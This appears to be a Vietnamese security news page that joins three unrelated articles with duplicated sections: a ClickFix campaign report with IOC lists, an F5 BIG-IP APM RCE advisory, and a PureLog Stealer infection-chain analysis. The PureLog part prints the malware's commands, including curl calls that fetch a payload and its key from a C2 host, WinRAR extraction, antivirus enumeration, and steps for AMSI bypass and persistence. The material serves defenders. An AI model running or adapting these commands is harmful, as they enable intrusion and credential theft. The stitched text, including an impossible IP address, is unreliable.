Bằng cách lừa người dùng tự thực thi lệnh độc hại, kẻ tấn công có thể vượt qua các cơ chế bảo mật truyền thống, triển khai các mã độc như NetSupport RAT và Odyssey Stealer để chiếm quyền và đánh cắp dữ liệu.

Khuyến nghị

Nhận diện và tránh ClickFix lừa đảo

• Không làm theo các hướng dẫn yêu cầu:

  • Mở Run (Win + R), Terminal hoặc Command Prompt

  • Dán lệnh được cung cấp từ website/email

• Cảnh giác với các trang giả mạo thương hiệu như:

  • QuickBooks, Booking, Apple, crypto sites

• Nếu thấy thông báo kiểu:

  • “Fix lỗi hệ thống”

  • “Verify account”

  • “Install required update”

Không tải hoặc chạy file không rõ nguồn gốc

• Không tải:

  • File .exe, .dmg, .pkg, .zip từ website lạ

• Không cài đặt phần mềm yêu cầu:

  • Tắt antivirus

  • Cấp quyền admin bất thường

• Chỉ tải từ:

  • Website chính thức hoặc App Store đáng tin cậy

Kiểm tra URL trước khi đăng nhập

• Kiểm tra kỹ domain:

  • Tránh các domain có dạng:

    • account-helpdesk[.]top

    • apple-diagnostic[.]wiki

• Luôn:

  • Gõ tay URL thay vì click link

  • Kiểm tra HTTPS và chứng chỉ

Bật bảo vệ tài khoản

• Bật Multi-Factor Authentication (MFA) cho:

  • Email

  • Tài khoản tài chính (QuickBooks, Booking)

• Sử dụng:

  • Password mạnh, không dùng lại

  • Password manager nếu có thể

Cập nhật hệ thống và phần mềm

• Luôn cập nhật:

  • Windows / macOS

  • Trình duyệt (Chrome, Edge, Safari)

• Vá lỗi giúp giảm nguy cơ bị khai thác

Cẩn trọng với email/phishing

• Không click:

  • Link từ email lạ

  • File đính kèm không rõ nguồn

• Kiểm tra:

  • Người gửi (spoofed domain)

  • Nội dung gây áp lực (urgent, scare tactics)

MITRE ATT&CK Mapping

IOCs

Intuit QuickBooks ClickFix

Domain

4freepics[.]com anthonydee[.]com ariciversonille[.]com bancatangcode[.]com billiardinstitute[.]com cskhga6789[.]com customblindinstall[.]com deinhealthcoach[.]com elive123go[.]com elive777a[.]com extracareliving[.]com fomomforhealth[.]com grandmastertraders[.]traderslinkfx[.]com guypinions[.]com hostmaster[.]extracareliving[.]com mrinmay[.]net ned[.]coveney-ltd[.]com nhacaired88[.]com orkneygateway[.]com quiptly[.]com shopifyservercloud[.]com subsgoal[.]com suedfactoring[.]lit[.]com surecomforts[.]com theinvestworthy[.]com traderslinkfx[.]com ustazazharidrus[.]com visitbundala[.]com yvngvualr[.]com

IP Addresses

45[.]193[.]20[.]50 45[.]193[.]20[.]141 87[.]236[.]16[.]20 94[.]156[.]112[.]115 193[.]35[.]17[.]12 193[.]58[.]122[.]97 193[.]222[.]99[.]212

Staging Domains

nobovcs[.]com quicrob[.]com robovcs[.]com

NetSupport RAT C2

62[.]164[.]177[.]230

File Hashes (NetSupport RAT)

25865914ff0ec9421a5fa7dff2f680498f8893374f24d0b67a735bd8369299e9 280c7fb3033c6c34df88b61a4c90eb03e1ae7d1dc00355ca280a83903b776473 3f8202dacab7371e760e83b7d2b8fbd5d767f5bd408ed713ab0550c83ae82933 52f2813b9a7449946bdb98c171320d1801aa37a65903416c1aa186e44c66d745 56ebaf8922749b9a9a7fa2575f691c53a6170662a8f747faeed11291d475c422

Booking.com ClickFix

Domains

acconthelpdesk[.]com account-help[.]info account-helpdesk[.]icu account-helpdesk[.]info account-helpdesk[.]top accountmime[.]com accountpulse[.]help admin-activitycheck[.]com checkaccountactivity[.]com checkhelpdesk[.]com helpdeskpulse[.]com pulse-help-desk[.]com sign-in-op-token[.]com thepulseactivity[.]com thestayreserve[.]com

IP Address

91[.]1202[.]233[.]206

Staging Domains

bkng-updt[.]com checkpulses[.]com

Staging IPs

77[.]191[.]65[.]131 77[.]191[.]65[.]144

NetSupport RAT C2 Domains

hotelupdatesys[.]com chrm-srv[.]com ms-scedg[.]com

NetSupport RAT C2 IP

152[.]89[.]244[.]70

File Hashes

397dcea810f733494dbe307c91286d08f87f64aebbee787706fe6561ed3e20f8 5d821db386c7c879caeabf3e9f94c94a48eec6ec5a3a0efbae9d69da3f52c1db 43907e54cf3d1258f695d1112759b5457576481072cc76a679b8477cfeb3db87 b17c3e4058aacdcc36b18858d128d6b3058e0ea607a4dc59eb95b18b7c6acc7c

Dual-Platform ClickFix (Windows + macOS)

Domains

appmacintosh[.]com appmacosx[.]com apposx[.]com appsmacosx[.]com appxmacos[.]com cryptoinfnews[.]com cryptoinfo-allnews[.]com cryptoinfo-news[.]com cryptonews-info[.]com financementure[.]com macapp-apple[.]com macapps-apple[.]com macosapp-apple[.]com macosx-app[.]com macosx-apps[.]com macosxapp[.]com macosxappstore[.]com macxapp[.]com macxapp[.]org valetfortesla[.]com

IP Address

45[.]144[.]233[.]192

Staging IPs (Odyssey Stealer C2)

45[.]135[.]232[.]33 217[.]119[.]139[.]117

Hash (Odyssey Stealer)

2e9356948f2214fbf12ab3e873e0057fb64764cb8ed9d1c82e7ab0b3eef92a37

Birdeye ClickFix

Domains

acebirdrep[.]com bebirdrank[.]com birdrankbox[.]com birdrankfx[.]com birdrankgo[.]com birdrankinc[.]com birdrankllc[.]com birdrankmax[.]com birdranktip[.]com birdrankup[.]com birdrankus[.]com birdrankusa[.]com birdrankvip[.]com birdrankzen[.]com birdrepbiz[.]com birdrepgo[.]com birdrephelp[.]com birdreplab[.]com birdrepsys[.]com birdrepusa[.]com birdrepuse[.]com bitbirdrank[.]com bitbirdrep[.]com fixbirdrank[.]com getbirdrank[.]com gobirdrank[.]com helpbirdrank[.]com helpbirdrep[.]com infobirdrep[.]com justbirdrank[.]com mybirdrank[.]com nowbirdrank[.]com optbirdrank[.]com probirdrep[.]com topbirdrank[.]com topbirdrep[.]com usbirdrank[.]com usebirdrep[.]com vipbirdrank[.]com

macOS Storage Cleaning ClickFix

Domains

apple[.]assistance-tools[.]com apple[.]diagnostic[.]wiki mac-os-helper[.]com macintosh-hub[.]com macos-storageperf[.]com stormac[.]lit[.]com

Tham khảo

New ClickFix Attack Leverage Windows Run Dialog Box and macOS Terminal to Deploy Malware

ClickFix Campaigns Targeting Windows and macOS

Amid increasingly sophisticated cyberattacks, a worrying trend is emerging: attackers no longer need to exploit system vulnerabilities—they exploit the users themselves. The ClickFix campaign clearly demonstrates this shift.

Discovered by Recorded Future, ClickFix is a social engineering attack technique where victims are tricked into performing seemingly harmless actions—like copying and running a script—but actually end up inadvertently activating malware on their own devices. No exploit or complex malware is needed from the start; the entire attack chain begins with a simple user action.

What makes ClickFix dangerous is its ability to bypass traditional defense mechanisms. When users themselves execute commands, security solutions like antivirus or EDR often struggle to detect this behavior as malicious. Furthermore, current ClickFix campaigns have expanded from Windows to macOS, clearly indicating a trend toward increasingly sophisticated cross-platform attacks.

Execution flow

ClickFix campaigns typically follow a clearly structured attack process consisting of four consecutive stages—each step is optimized to exploit user behavior and evade traditional defense mechanisms.

Lure – Entice with Fake Legitimate Interfaces The attack chain begins by deceiving victims through familiar interfaces like fake CAPTCHAs or "human verification" systems. These pages are intricately designed to appear trustworthy and urgent, making users believe they need to perform a simple action to proceed.

Execution – Activation through User Interaction (LotL) After being convinced, victims are instructed to copy and execute an obfuscated script. These commands are typically run via: Run (Windows) or Terminal (Windows/macOS).

Remote Ingress – Download payload from control infrastructure When the command is executed, the system establishes an external connection to download malicious components (payload staging). This process typically uses: Embedded shell, Remote download script. In-Memory Execution – Execute without leaving traces In the final stage, the malware runs directly in memory (in-memory execution) instead of being written to disk. This minimizes forensic traces and helps avoid detection by file-based security tools.

Detailed technical analysis

The ClickFix campaign is divided into several clusters with different approaches and techniques, demonstrating a clear level of targeting and high sophistication in payload deployment.

Cluster 1 – QuickBooks (Targeting accounting users)

This cluster focuses on QuickBooks users, primarily accounting or finance personnel. The attacker uses fake pages requesting "system error fixes" to trick users into executing commands.

Here, users manually launch PowerShell with Admin rights and run a script designed by the attackers.

Once the victim executes the command, the malicious payload "bibi.php" is immediately saved in the "%TEMP%" directory as script.ps1. This step initiates the installation process of NetSupport RAT.

This payload continuously connects to the C2 address: gologpoint[.]com - 62[.]164[.]177[.]230 to receive commands and download other malicious files. During the analysis, experts recorded four additional malicious files, including

After NetSupport RAT is installed, the attacker can remotely control the computer, record the screen, manipulate the keyboard, and install additional malware. At this stage, the attacker also extracts all sensitive customer information, including customer details, transaction history, tax information, and financial data.

Cluster 2 – Booking.com (Fake CAPTCHA Trap)

This cluster targets users of booking services like Booking.com, using fake CAPTCHA techniques to increase credibility. Here, users are asked to verify "NOT A ROOT."

Similar to Cluster 1, instead of a real CAPTCHA, the page designed by the attacker will instruct you to open PowerShell and run a command containing the parameter: "-ExecutionPolicy Bypass".

With this malicious command, the attacker can disable PowerShell's security policy, allowing them to download and execute malicious scripts remotely.

Throughout the execution process, the malware continuously communicates with the C2 to receive commands and store the stolen information.

As mentioned, the danger here is that users believe they are performing a security step, but in reality, they are opening the door for malware to run.

Cluster 3 – Birdeye (Targeting Small Businesses)

This cluster targets small businesses using review platforms like Birdeye. Here, the fake page contains JavaScript designed to evade automated scanning systems (sandbox, crawler).

In this section, the attacker also runs a PowerShell command written in an "obfuscated" form to conceal the true behavior. This is a common technique in cyberattacks or malware to load and execute scripts remotely.

Its main purpose is to download malware remotely from the address https://alababababa.cloud/cVGvQio6.txt and then directly execute the downloaded content on the victim's computer.

Cluster 4 & 5 – macOS (Exploiting Mac Users)

These clusters focus on macOS users—who are typically less targeted and therefore more likely to let their guard down.

Users are instructed to run the curl command in Terminal: "curl -kfsSL ". The -k parameter is used to bypass TLS certificate checks (potentially a fake server), while the -fsSL parameters download content "silently," without displaying errors.

The payload will be concealed using hex encoding and base64 encoding, then immediately decoded and executed directly on the machine. After running, the script will download and execute MacSync Stealer. This malware is tasked with stealing browser information, cookies, credentials, and crypto wallet data.

A notable aspect of this infection chain is its ability to attack directly through the Terminal (a trusted interface), cleverly exploiting the perception that "Mac is safer than Windows."

Conclusion

The ClickFix campaign demonstrates an effective combination of social engineering and cross-platform malware distribution, targeting both Windows and macOS through fake brands like QuickBooks, Booking, or Apple. By tricking users into executing malicious commands themselves, attackers can bypass traditional security mechanisms, deploying malware such as NetSupport RAT and Odyssey Stealer to gain control and steal data.

Recommendation

Recognize and Avoid ClickFix Scams

• Do not follow the instructions given:

  • Open Run (Win + R), Terminal, or Command Prompt

  • Paste the command provided from the website/email

• Beware of fake brand websites such as:

  • QuickBooks, Booking, Apple, cryptocurrency sites

• If you see a message like:

  • "Fix system error"

  • "Verify account"

  • "Install required update"

Do not download or run files from unknown sources.

• Do not download:

  • File .exe, .dmg, .pkg, .zip from unfamiliar websites

• Do not install the requested software:

  • Turn off antivirus

  • Grant unusual admin permissions

• Only download from:

  • Official websites or trusted App Stores

Check the URL before logging in

• Check the domain carefully:

  • Avoid domains like:

    • account-helpdesk[.]top

    • apple-diagnostic[.]wiki

• Always:

  • Type the URL manually instead of clicking links

  • Check for HTTPS and certificates

Enable account protection

• Enable Multi-Factor Authentication (MFA) for:

  • Email

  • Financial accounts (QuickBooks, Booking)

• Use:

  • Strong passwords, do not reuse

  • Password manager if possible

Update system and software

• Always update:

  • Windows / macOS

  • Browsers (Chrome, Edge, Safari)

Be cautious with email/phishing

• Do not click on:

  • Links from unfamiliar emails

  • Attachments from unknown sources

• Check:

  • Sender (spoofed domain)

  • Pressure content (urgent, scare tactics)

MITRE ATT&CK Mapping

IOCs

Intuit QuickBooks ClickFix

Domain

4freepics[.]com anthonydee[.]com ariciversonille[.]com bancatangcode[.]com billiardinstitute[.]com cskhga6789[.]com customblindinstall[.]com deinhealthcoach[.]com elive123go[.]com elive777a[.]com extracareliving[.]com fomomforhealth[.]com grandmastertraders[.]traderslinkfx[.]com guypinions[.]com hostmaster[.]extracareliving[.]com mrinmay[.]net ned[.]coveney-ltd[.]com nhacaired88[.]com orkneygateway[.]com quiptly[.]com shopifyservercloud[.]com subsgoal[.]com suedfactoring[.]lit[.]com surecomforts[.]com theinvestworthy[.]com traderslinkfx[.]com ustazazharidrus[.]com visitbundala[.]com yvngvualr[.]com

IP Addresses

45[.]193[.]20[.]50 45[.]193[.]20[.]141 87[.]236[.]16[.]20 94[.]156[.]112[.]115 193[.]35[.]17[.]12 193[.]58[.]122[.]97 193[.]222[.]99[.]212

Staging Domains

nobovcs[.]com quicrob[.]com robovcs[.]com

NetSupport RAT C2

62[.]164[.]177[.]230

File Hashes (NetSupport RAT)

25865914ff0ec9421a5fa7dff2f680498f8893374f24d0b67a735bd8369299e9 280c7fb3033c6c34df88b61a4c90eb03e1ae7d1dc00355ca280a83903b776473 3f8202dacab7371e760e83b7d2b8fbd5d767f5bd408ed713ab0550c83ae82933 52f2813b9a7449946bdb98c171320d1801aa37a65903416c1aa186e44c66d745 56ebaf8922749b9a9a7fa2575f691c53a6170662a8f747faeed11291d475c422

Booking.com ClickFix

Domains

acconthelpdesk[.]com account-help[.]info account-helpdesk[.]icu account-helpdesk[.]info account-helpdesk[.]top accountmime[.]com accountpulse[.]help admin-activitycheck[.]com checkaccountactivity[.]com checkhelpdesk[.]com helpdeskpulse[.]com pulse-help-desk[.]com sign-in-op-token[.]com thepulseactivity[.]com thestayreserve[.]com

IP Address

91[.]1202[.]233[.]206

Staging Domains

bkng-updt[.]com checkpulses[.]com

Staging IPs

77[.]191[.]65[.]131 77[.]191[.]65[.]144

NetSupport RAT C2 Domains

hotelupdatesys[.]com chrm-srv[.]com ms-scedg[.]com

NetSupport RAT C2 IP

152[.]89[.]244[.]70

File Hashes

397dcea810f733494dbe307c91286d08f87f64aebbee787706fe6561ed3e20f8 5d821db386c7c879caeabf3e9f94c94a48eec6ec5a3a0efbae9d69da3f52c1db 43907e54cf3d1258f695d1112759b5457576481072cc76a679b8477cfeb3db87 b17c3e4058aacdcc36b18858d128d6b3058e0ea607a4dc59eb95b18b7c6acc7c

Dual-Platform ClickFix (Windows + macOS)

Domains

appmacintosh[.]com appmacosx[.]com apposx[.]com appsmacosx[.]com appxmacos[.]com cryptoinfnews[.]com cryptoinfo-allnews[.]com cryptoinfo-news[.]com cryptonews-info[.]com financementure[.]com macapp-apple[.]com macapps-apple[.]com macosapp-apple[.]com macosx-app[.]com macosx-apps[.]com macosxapp[.]com macosxappstore[.]com macxapp[.]com macxapp[.]org valetfortesla[.]com

IP Address

45[.]144[.]233[.]192

Staging IPs (Odyssey Stealer C2)

45[.]135[.]232[.]33 217[.]119[.]139[.]117

Hash (Odyssey Stealer)

2e9356948f2214fbf12ab3e873e0057fb64764cb8ed9d1c82e7ab0b3eef92a37

Birdeye ClickFix

Domains

acebirdrep[.]com bebirdrank[.]com birdrankbox[.]com birdrankfx[.]com birdrankgo[.]com birdrankinc[.]com birdrankllc[.]com birdrankmax[.]com birdranktip[.]com birdrankup[.]com birdrankus[.]com birdrankusa[.]com birdrankvip[.]com birdrankzen[.]com birdrepbiz[.]com birdrepgo[.]com birdrephelp[.]com birdreplab[.]com birdrepsys[.]com birdrepusa[.]com birdrepuse[.]com bitbirdrank[.]com bitbirdrep[.]com fixbirdrank[.]com getbirdrank[.]com gobirdrank[.]com helpbirdrank[.]com helpbirdrep[.]com infobirdrep[.]com justbirdrank[.]com mybirdrank[.]com nowbirdrank[.]com optbirdrank[.]com probirdrep[.]com topbirdrank[.]com topbirdrep[.]com usbirdrank[.]com usebirdrep[.]com vipbirdrank[.]com

macOS Storage Cleaning ClickFix

Domains

apple[.]assistance-tools[.]com apple[.]diagnostic[.]wiki mac-os-helper[.]com macintosh-hub[.]com macos-storageperf[.]com stormac[.]lit[.]com

Refer to

New ClickFix Attack Leverage Windows Run Dialog Box and macOS Terminal to Deploy Malware

ClickFix Campaigns Targeting Windows and macOS

Thông tin chi tiết

• Định danh lỗ hổng: CVE-2025-53521

• Điểm CVSS (4.0): 9.3

• Mức độ nghiêm trọng: CRITICAL - Cực kỳ nghiêm trọng

• Mô tả: Lỗi được xác định trong F5 BIG-IP Access Policy Manager (APM), xảy ra khi một chính sách truy cập được thiết lập trên máy chủ ảo (virtual server) có thể cho phép các lưu lượng truy cập độc hại kết nối, từ đó dẫn đến cho phép thực thi mã từ xa (RCE).

• Phiên bản bị ảnh hưởng:

F5 BIG-IP là giải pháp Bộ điều khiển phân phối ứng dụng (Application Delivery Controller - ADC) hàng đầu thế giới. Trong hạ tầng công nghệ thông tin, F5 BIG-IP đóng vai trò là "điểm tiếp nhận tập trung" (Gateway) đứng trước các máy chủ dịch vụ, chịu trách nhiệm quản lý, tối ưu hóa và bảo mật toàn bộ lưu lượng truy cập từ người dùng đến ứng dụng.

F5 BIG-IP được sử dụng rộng rãi trong các tổ chức, doanh nghiệp nhờ các ưu điểm cốt lõi:

• Cân bằng tải (Load Balancing): Đảm bảo tính sẵn sàng cao bằng cách phân phối thông minh yêu cầu của người dùng đến các máy chủ đang hoạt động ổn định, loại bỏ tình trạng quá tải cục bộ.

• Bảo mật ứng dụng (Security): Tích hợp các lớp phòng thủ chuyên sâu (WAF, Firewall, Access Control) để ngăn chặn các hình thức tấn công khai thác lỗ hổng và truy cập trái phép.

• Tối ưu hóa hiệu suất: Tăng tốc độ phản hồi của ứng dụng thông qua các kỹ thuật nén dữ liệu và điều phối luồng thông tin hiệu quả.

Do những ưu điểm cốt lõi trên mà F5 BIG-IP thường được đứng tại những vị trí nhạy cảm trong các tổ chức và doanh nghiệp, đóng vai trò là lớp phòng thủ đầu tiên cũng như là chốt chặn cuối cùng trước khi dữ liệu đi vào vùng lõi (backend), khiến nó trở thành mục tiêu giá trị đối với bất kỳ kẻ tấn công nào. Do đó, việc đảm bảo an toàn bảo mật luôn được đặt lên hàng đầu.

Mới đây, Cơ quan An ninh Cơ sở hạ tầng và An ninh mạng Hoa Kỳ (CISA) đã bổ sung thêm một lỗ hổng trong sản phẩm F5 BIG-IP vào danh mục Các Lỗ hổng Đang bị Khai thác (KEV) của mình, cảnh báo rằng lỗ hổng này đang bị khai thác tích cực trên thực tế.

Lỗ hổng được xác định là CVE-2025-53521, tồn tại trong giải pháp BIG-IP APM (Access Policy Manager) - một proxy quản lý truy cập tập trung của F5. Giải pháp này được thiết kế nhằm hỗ trợ quản trị viên bảo mật quyền truy cập vào mạng nội bộ, nền tảng đám mây, các ứng dụng và API của tổ chức.

CVE-2025-53521 cho phép kẻ tấn công không có bất kỳ đặc quyền nào hay chưa từng có tài khoản nào trên hệ thống, có thể lợi dụng, khai thác trực tiếp lỗ hổng nhằm đạt được quyền thực thi mã từ xa trên các instance BIG-IP APM chưa được vá lỗi, đặc biệt là các hệ thống có cấu hình chính sách truy cập trên các máy chủ ảo.

Mặc dù lỗ hổng này đã xuất hiện từ cách đây 5 tháng, tuy nhiên Shadowserver - một tổ chức phi lợi nhuận quốc tế chuyên thu thập, giám sát, phân tích và cảnh báo các mối đe doạ trên không gian mạng cho biết, hiện vẫn có hơn 17.000 địa chỉ IP có dấu hiệu sử dụng BIG-IP APM, trong đó khoảng 14.000 instance F5 BIG-IP APM đang nằm trong tình trạng nguy hiểm, nguy cơ cao trở thành mục tiêu tiếp theo bị nhắm tới trong bối cảnh phía F5 đã ghi nhận nhiều cuộc tấn công khai thác lỗ hổng này trên thực tế.

Khuyến nghị & Khắc phục

Các chuyên gia an ninh mạng thuộc F5 đã công bố những dấu hiệu nhận biết xâm nhập (IOCs) rộng rãi trên không gian mạng, người dùng và quản trị viên cần:

• Cập nhật bản vá: Cập nhật lên phiên bản mới nhất của BIG-IP APM nhằm khắc phục toàn diện nguy cơ. Danh sách các phiên bản được vá bao gồm: 17.5.1.3 17.1.3 16.1.6.1 15.1.10.8

• Kiểm tra hệ thống: Rà soát ổ đĩa, nhật ký hệ thống (logs) và lịch sử thao tác terminal trên các thiết bị BIG-IP để tìm kiếm dấu hiệu hoạt động trái phép. Thiết lập kiểm soát truy cập nghiêm ngặt, triển khai nguyên tắc đặc quyền tối thiểu (least privilege) cho tất cả người dùng và dịch vụ truy cập vào F5 BIG-IP.

• Xây dựng kế hoạch xử lý sự cố: Xây dựng kế hoạch, phương án xử lý nếu phát sinh sự cố. Khi phát hiện có dấu hiệu bị xâm nhập, biện pháp an toàn nhất là xây dựng lại hệ thống từ đầu, do đó cần có kế hoạch đầy đủ để đưa trạng thái hệ thống về mức bình thường một cách nhanh nhất.

• Cô lập & Sao lưu dữ liệu: F5 nhấn mạnh rằng các bản sao lưu cấu hình (UCS) được tạo sau thời điểm bị tấn công có thể chứa mã độc lâu dài. Do đó, quản trị viên và người dùng chỉ nên khôi phục cấu hình từ các bản sao lưu được xác minh an toàn. Ngoài ra, người dùng và quản trị viên cũng cần cô lập các hệ thống BIG-IP khỏi các phần còn lại của mạng để hạn chế khả năng di chuyển ngang nếu hệ thống bị xâm nhập.

Danh sách IOC

Quản trị viên và người dùng có thể truy cập danh sách IOC do F5 cung cấp thông qua đường dẫn sau:

• https://my.f5.com/manage/s/article/K000160486

Tham khảo

1. CVE-2025-53521

2. F5 Security Advisory

3. Over 14,000 F5 BIG-IP APM instances still exposed to RCE attacks

Đối tượng bị ảnh hưởng: Tổ chức trong ngành y tế, chính phủ, khách sạn và giáo dục tại Đức, Canada, Mỹ và Úc. Chiến dịch cũng lạm dụng Google Ads malvertising song song với phishing email để phân phối payload.

Rủi ro cốt lõi: PureLog Stealer thu thập credential Chrome, extension trình duyệt, ví crypto và thông tin hệ thống — toàn bộ thực thi trong memory, không ghi file lên disk, khiến nhiều giải pháp AV truyền thống bỏ sót.

Hành động ưu tiên ngay: Block các domain C&C đã xác định, bật behavioral detection trên endpoint, và hunt proactively với query detectionName:*PURELOGSSTEALER* trong SIEM/EDR.

Tổng quan chiến dịch

PureLog Stealer vốn được biết đến là infostealer "entry-level" — giá rẻ, dễ dùng, thường được các threat actor ít kinh nghiệm khai thác. Điều làm chiến dịch này khác biệt không phải là bản thân payload, mà là delivery chain được thiết kế kỹ lưỡng bất thường cho một công cụ "low-cost".

Kỹ thuật này không phải ngẫu nhiên — nó tăng đáng kể tỷ lệ người dùng thực thi file vì lure trông "đúng ngữ cảnh" với môi trường làm việc của họ.

Điểm kỹ thuật nổi bật

• DLL sideloading khởi tạo execution

• Payload mã hóa giả dạng file PDF

• Khóa giải mã được lấy từ endpoint riêng của C&C (không hardcode trong malware)

• WinRAR bị đổi tên thành file PNG dùng để giải nén

• Python loader giải mã và thực thi PureLog Stealer hoàn toàn trong memory

Chuỗi lây nhiễm chi tiết

Hình 1. Chuỗi lây nhiễm đầy đủ của chiến dịch

Stage 1 — Người dùng thực thi lure file

Chuỗi lây nhiễm khởi động khi nạn nhân chủ động chạy file giả mạo. Không có exploit, không có zero-day — toàn bộ phụ thuộc vào social engineering. Executable sau đó gọi command interpreter:

cmd.exe /c ...

Stage 2 — Decoy document

Ngay lập tức, malware mở một file PDF "bình thường" để đánh lạc hướng người dùng:

start "" ".\_\document.pdf"

Kỹ thuật này tạo cảm giác hành động của người dùng là hợp lệ — họ thấy một tài liệu hiện ra đúng như kỳ vọng khi click vào "thông báo vi phạm bản quyền".

Stage 3 — Tải payload mã hóa

Malware tải payload từ C&C với một số kỹ thuật đáng chú ý:

curl -A "curl/meow_meow" -s -k -L "https://quickdocshare.com/DQ" -o ".\_\invoice.pdf"

• Custom User-Agent curl/meow_meow: không khớp với bất kỳ browser/tool hợp lệ nào — indicator đơn giản nhưng hữu ích cho network detection

• -k (ignore TLS validation): cho phép dùng self-signed cert ở C&C

• -L (follow redirect): linh hoạt thay đổi hosting location

• File lưu dưới tên invoice.pdf nhưng thực chất là encrypted archive

Stage 4 — Lấy khóa giải mã từ xa

Đây là điểm thiết kế thông minh nhất của chiến dịch. Thay vì embed password trong malware:

curl -A "curl/meow_meow" -s -k -L "https://quickdocshare.com/DQ/key"

Response được capture vào biến %i trong command line. Thiết kế này có ba hệ quả:

1. Không có static password → analyst không thể giải mã payload khi offline

2. Operator có thể rotate password per-victim → mỗi ca nhiễm có thể được kiểm soát độc lập

3. Có thể vô hiệu hóa payload bất kỳ lúc nào bằng cách xóa key endpoint

Stage 5 — Giải nén bằng WinRAR đổi tên

".\_\FILE_2025년_재직증명서_원본.png" x -p"%i" ".\_\invoice.pdf" "C:\Users\Public\" -y

File .png trên thực chất là WinRAR executable bị đổi tên, giải nén payload với password lấy động từ Stage 4. Extension .png không ảnh hưởng đến khả năng thực thi — Windows thực thi dựa trên PE header, không phải extension.

Stage 6 — Xóa dấu vết

del ".\_\invoice.pdf"

Xóa file archive mã hóa sau khi giải nén xong, giảm forensic artifacts trên disk.

Stage 7 — Chuyển working directory

cd "C:\Users\Public\Windows"

Thư mục C:\Users\Public\Windows không tồn tại mặc định trên Windows — đây là directory malware tự tạo. Tên gợi nhớ đến C:\Windows hợp lệ nhưng nằm dưới Public, không yêu cầu quyền admin để ghi.

Stage 8 — Thực thi second-stage loader

"C:\Users\Public\Windows\svchost.exe" "instructions.pdf"

Hai điểm cần lưu ý:

• svchost.exe ở đây không phải Windows service host hợp lệ — đây là python.exe bị đổi tên

• instructions.pdf là Python script bị obfuscate, đóng vai trò loader cho hai .NET executable tiếp theo

Phân tích biến thể

Trend Micro xác định hai infection chain song song, chia sẻ cùng toolset nhưng có sự khác biệt rõ về operational security:

Chain 2 phức tạp hơn về operational security (không để key trên disk, cần C&C active). Chain 1 đơn giản hơn nhưng key hardcode — dễ bị extract hơn. Sự tồn tại của hai chain cho thấy operator đang iterate và test các approach khác nhau.

Phân tích instructions.pdf

Bất chấp extension .pdf, file này là Python script bị obfuscate nặng — mọi string đều Base64-encode, mọi hằng số đều ẩn sau biểu thức toán học nhiều hạng tử. Khi stripped toàn bộ noise, script triển khai 8 capability theo thứ tự thực thi xác định.

Hình 11. Các capability của instructions.pdf

Capability 1: AMSI Bypass

Script vô hiệu hóa Windows Defender AMSI (Antimalware Scan Interface) trước khi load payload, thực hiện qua hai stage:

• Stage 1: Patch entry point của AmsiScanBuffer với MOV EAX, E_INVALIDARG + JMP — function này sẽ luôn trả về "not malicious"

• Stage 2: Scan forward từ entry point để tìm mọi conditional jump (JZ/JNZ) và thay bằng unconditional JMP — bypass vẫn hoạt động ngay cả khi Stage 1 bị partial detection

Hình 12. Python code patch AMSI trong memory để bypass antivirus scanning

Capability 2: Reflective .NET Assembly Load qua COM/CLR

Sau khi vô hiệu AMSI, script load một .NET assembly mã hóa hoàn toàn trong memory. Quy trình:

1. Bootstrap .NET CLR bằng raw COM vtable calls

2. Construct SAFEARRAY chứa decrypted assembly bytes

3. Gọi AppDomain.Load_3() để reflectively load và execute payload

Không có file nào được ghi xuống disk tại bước này. Calling convention được chọn runtime dựa trên kiến trúc 32/64-bit.

Hình 13. XOR-decrypted .NET payload được load và thực thi trong memory

Capability 3: Registry Persistence

Script tự cài vào autorun registry dưới current user's Run key:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Value name: "SystemSettings"

Tên SystemSettings mimics Windows component hợp lệ. Script xóa value cũ trước khi ghi để đảm bảo path luôn current — malware sẽ re-execute mỗi lần user đăng nhập.

Hình 14. Python script thiết lập persistence

Capability 4: Full-Screen Capture

Script chụp toàn bộ desktop ở full resolution bằng Windows GDI API, xử lý raw 24-bit BGR pixel data, xây PNG file hoàn chỉnh trong memory — không dùng PIL/Pillow, không ghi file — sau đó Base64-encode để đưa vào JSON exfiltration payload.

Hình 15. Desktop capture được convert thành PNG và Base64-encode để exfiltrate

Capability 5: Victim Fingerprinting

Trước khi exfiltrate screenshot, script thu thập:

• Hostname của máy

• Tên người dùng đang đăng nhập

• Tên tất cả antivirus đang cài đặt (qua WMI SecurityCenter2)

powershell -NoProfile -WindowStyle Hidden -Command "Get-WmiObject -Namespace root/SecurityCenter2 -Class AntivirusProduct | ForEach-Object { $_.displayName }"

Thông tin AV này phục vụ mục đích reconnaissance — xác định đây có phải high-value target không và lựa chọn payload tiếp theo phù hợp.

Hình 16. Machine fingerprint thu thập từ hệ thống nạn nhân

Capability 8: C&C Exfiltration qua HTTPS POST

Toàn bộ data được đóng gói JSON và gửi lên C&C qua HTTPS. Để tránh gửi trùng lặp sau mỗi lần boot (do persistence Run key), script kiểm tra registry key thứ hai:

HKCU\...\AppModel\StateRepository
Value: CacheVersion = 1337 (DWORD)

Sau lần exfiltrate thành công đầu tiên (HTTP 200), script ghi giá trị 1337 vào key này. Những lần chạy tiếp theo sẽ đọc key này và exit sớm nếu thấy 1337.

Hình 17. Screenshot và machine fingerprint được exfiltrate

Từ loader đến payload cuối: PureLog Stealer in-memory

Script instructions.py chứa hai .NET executable payload được XOR-encrypt và Base64-encode. Khi thực thi, script giải mã ra Dgrfauysx.exe và Fsywsuac.exe, launch cả hai đồng thời.

Dual .NET Loader Design

Cả hai loader có cấu trúc giống nhau và đều được bảo vệ bởi ConfuserEx — obfuscator state-machine-based phân mảnh control flow qua hàng trăm switch-case branch. Pipeline giải mã:

1. Gọi ResourceManager.GetObject() với resource name hardcode để lấy encrypted byte blob

2. Giải mã blob bằng TripleDES-CBC (key và IV embed dưới dạng Base64 trong .NET #US heap)

3. Decompress GZip stream ra .NET assembly trong memory

4. Gọi Assembly.Load() — không ghi file nào xuống disk

Thiết kế hai loader chạy song song là redundancy mechanism: nếu một loader bị endpoint control chặn hoặc kill, loader kia vẫn độc lập deliver và execute PureLog Stealer. Cả hai dùng cùng C&C address và registry persistence key.

PureLog Stealer — Thực thi hoàn toàn trong managed heap

Assembly được load bởi Assembly.Load() là PureLog Stealer, thực thi hoàn toàn trong managed heap của loader process. Không có file nào được ghi, khiến AV truyền thống scan file creation events không phát hiện được. Sau khi loader chuyển control, nó thực hiện GC.Collect() để xóa object của mình khỏi heap, chỉ để lại PureLog Stealer là .NET code duy nhất đang active.

Hình 18. Chuỗi lây nhiễm đầy đủ đến PureLog Stealer

Pivot artifacts và telemetry

Download ban đầu

